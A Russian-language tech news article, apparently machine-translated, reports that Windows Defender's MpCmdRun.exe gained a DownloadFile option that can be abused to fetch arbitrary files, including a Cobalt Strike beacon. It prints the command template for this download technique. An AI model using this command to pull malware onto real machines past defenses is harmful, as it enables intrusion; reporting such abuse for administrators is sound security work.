Защитник Windows превратился в опасное приложение для администраторов

Защитник Windows в Windows 10 - это первая линия защиты в случае атак вредоносного ПО, и он тоже довольно хорошая работа.

Однако в одном из своих новых обновлений могучий антивирус получил новую команду DownloadFile, которая позволит любому загружать любой файл с URL-адреса по определенному пути на вашем компьютере.

Мы можем назвать это эксплойтом, поскольку он также может использоваться даже для загрузки вредоносных программ, что было обнаружено исследователем безопасности Мохаммадом Аскаром, который опубликовал его находка в Твиттере.

Как можно использовать Защитник Windows для загрузки вредоносных программ?

Очень просто использовать служебную программу командной строки службы Microsoft Antimalware (MpCmdRun.exe) для загрузки любого файла из внешнего источника на ваш компьютер.

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

В своей попытке Аскар смог загрузить Cobalt Strike beacon, известный инструмент злоумышленников, используя эту командную строку.

Новая команда включена в версию 4.18.2007.8-0 и выше, что дает неплохой стартовый момент для нападающих.

По сути, эта функция превращается Защитник Windows в LOLBIN (живущие в автономных двоичных файлах), безобидный системный файл, который можно использовать в злонамеренных целях.

К счастью, после загрузки вредоносного файла он будет обнаружен тем же Защитником Windows или другим программа-антивирус если представить.

Из надежной программы защиты Защитник Windows превратился в еще одну возможную угрозу, за которой придется пристально следить администраторам и экспертам по безопасности.

Если у вас есть предложения или комментарии, оставьте их ниже в разделе комментариев.